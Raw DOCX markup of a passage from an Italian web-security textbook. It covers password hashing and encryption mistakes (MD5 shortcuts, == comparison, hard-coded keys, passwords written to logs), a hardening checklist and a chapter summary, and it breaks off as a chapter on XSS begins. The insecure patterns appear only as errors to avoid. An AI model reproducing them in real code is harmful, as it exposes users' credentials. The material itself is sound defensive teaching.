              <w:t xml:space="preserve">secrets.token_bytes</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cost factor bcrypt &lt; 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cracking troppo veloce</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cost 12 o 13 nel 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Codice</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">scorciatoia</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">che hash con MD5 in parallelo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Annulla la protezione (caso Ashley Madison)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mai introdurre algoritmi paralleli più deboli</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Confronto stringa con</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">==</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">invece di</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">bcrypt.checkpw</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Timing attack possibile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sempre</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">bcrypt.checkpw</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Chiave di cifratura nel codice sorgente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compromissione totale al primo leak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Variabili d’ambiente o vault</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">“</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Recupero password</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">che invia la password vecchia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Indica password salvata in chiaro o cifrata</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Reset password con link a singolo uso</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Password recente in log (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">logger.info("login user=mario pwd=...")</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Password leakate nei log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mai loggare password (anche se hashate)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="342"/>
    <w:bookmarkStart w:id="343" w:name="Xb76f1174c3a91629f4eb7f983599cd219611595"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="537" w:name="sec_7_12"/>
      <w:r>
        <w:t xml:space="preserve">7.12 Checklist operativa Cryptographic Failures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="537"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Mai password in chiaro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, mai</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Mai password cifrate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(la cifratura è reversibile)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Hash con bcrypt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(cost 12+) o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Argon2id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(parametri OWASP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Salt unico per ogni password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(bcrypt/Argon2id lo fanno automaticamente)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">MD5 / SHA-1 / SHA-256 mai per password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(sono per integrità file, non per password)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Verifica con</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">bcrypt.checkpw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, mai con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">==</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tempi di risposta uniformi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(timing attack)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Reset password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con link a singolo uso e scadenza breve,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">mai</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">invio della password vecchia</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cifratura dati a riposo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: AES-256-GCM (libreria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cryptography</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Chiavi di cifratura</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in variabili d’ambiente o vault, mai nel codice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Mai loggare password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">né hash né chiavi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">HTTPS obbligatorio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per il trasporto delle password (in chiaro nel body delle POST!)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Periodicamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, aumentare il cost bcrypt al re-hash (al login successivo riHashare con cost più alto)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="343"/>
    <w:bookmarkStart w:id="344" w:name="riepilogo-del-capitolo-6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="538" w:name="sec_7_13"/>
      <w:r>
        <w:t xml:space="preserve">7.13 Riepilogo del capitolo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="538"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1130"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Encoding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Base64, hex)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non è cifratura</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Reversibile in millisecondi senza chiave.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1130"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cifratura</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(AES-256-GCM) è reversibile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">con chiave</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Usata per dati che devi recuperare.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1130"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Hashing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è non reversibile, senza chiave. Usato per password e integrità.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1130"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le password si</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">hashano</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, non si cifrano. Anche tu (server) non devi conoscerle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1130"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">MD5, SHA-1, SHA-256</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non vanno mai usati per password: troppo veloci. Cracking con GPU = miliardi/secondo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1130"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">bcrypt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(cost 12+) e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Argon2id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sono progettati apposta per essere lenti.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">bcrypt = 50 milioni di volte più lento di MD5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1130"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">salt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è una stringa casuale unica per ogni password, salvata nel DB con l’hash. Neutralizza rainbow table e collisioni di password identiche.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">bcrypt e Argon2id lo fanno automaticamente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1130"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I dati sensibili</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">recuperabili</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(carte di credito, documenti) si</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cifrano</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con AES-256-GCM. La chiave non sta mai nel codice.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1130"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hai trasformato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">da</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">password in chiaro nel DB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">bcrypt cost 12 con salt automatico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Hai dimostrato sulla tua pelle che MD5 si cracka in millisecondi e bcrypt in anni.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Prossimo capitolo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Site Scripting (XSS).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Il problema di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">fare eseguire il proprio JavaScript dentro il sito di un altro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: furto di sessioni, defacement, redirect a phishing. È OWASP A05 — Injection (insieme a SQLi).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="344"/>
    <w:bookmarkEnd w:id="345"/>
    <w:bookmarkStart w:id="375" w:name="capitolo-8-cross-site-scripting-xss"/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="539" w:name="ch_8"/>
      <w:r>
        <w:t xml:space="preserve">Capitolo 8 — Cross-Site Scripting (XSS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="539"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa devi sapere prima di leggere questo capitolo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Capitoli 3 (cookie, sessione, header), 4 (OWASP A05), 5 (SQL Injection — userai</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">esteso). Un minimo di HTML (i tag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
